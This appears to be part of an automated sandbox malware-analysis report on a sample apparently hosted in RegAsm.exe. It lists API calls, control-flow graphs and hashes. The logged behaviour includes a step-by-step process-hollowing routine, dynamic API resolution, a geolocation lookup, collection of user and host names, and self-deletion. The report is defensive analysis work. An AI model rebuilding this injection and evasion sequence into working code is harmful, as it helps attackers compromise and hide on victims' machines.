                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                          • API String ID: 4236061018-3687161714
                                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                          • NtClose.NTDLL(?), ref: 00418332
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                          • WriteProcessMemory.KERNEL32 ref: 00418446
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                          • NtClose.NTDLL(?), ref: 004184A3
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                          • GetLastError.KERNEL32 ref: 004184B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                          • API String ID: 316982871-3035715614
                                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1624 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1631 10001177-1000119e lstrlenW FindFirstFileW 1624->1631 1632 10001168-10001172 lstrlenW 1624->1632 1633 100011a0-100011a8 1631->1633 1634 100011e1-100011e9 1631->1634 1632->1631 1635 100011c7-100011d8 FindNextFileW 1633->1635 1636 100011aa-100011c4 call 10001000 1633->1636 1635->1633 1638 100011da-100011db FindClose 1635->1638 1636->1635 1638->1634
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                          • String ID:
                                          • API String ID: 1083526818-0
                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                          • ExitProcess.KERNEL32 ref: 0040F905
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 5.1.1 Pro$`.p$override$pth_unenc
                                          • API String ID: 2281282204-1234790340
                                          • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                          • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1687 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1692 41b456-41b477 InternetReadFile 1687->1692 1693 41b479-41b499 call 4020b7 call 403376 call 401fd8 1692->1693 1694 41b49d-41b4a0 1692->1694 1693->1694 1695 41b4a2-41b4a4 1694->1695 1696 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1694->1696 1695->1692 1695->1696 1700 41b4b8-41b4c2 1696->1700
                                          APIs
                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                          Strings
                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleOpen$FileRead
                                          • String ID: http://geoplugin.net/json.gp
                                          • API String ID: 3121278467-91888290
                                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                          APIs
                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                          • String ID:
                                          • API String ID: 3950776272-0
                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimes$Sleep__aulldiv
                                          • String ID:
                                          • API String ID: 188215759-0
                                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,007095D0), ref: 004338DA
                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser
                                          • String ID:
                                          • API String ID: 4229901323-0
                                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                          • Instruction Fuzzy Hash:

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 94 40ef2c 89->94 95 40ec57 90->95 96 40ec59-40ec65 call 41b354 90->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 143 40eca4-40ecaa 140->143 143->107 147 40ecac call 40729b 143->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                          APIs
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
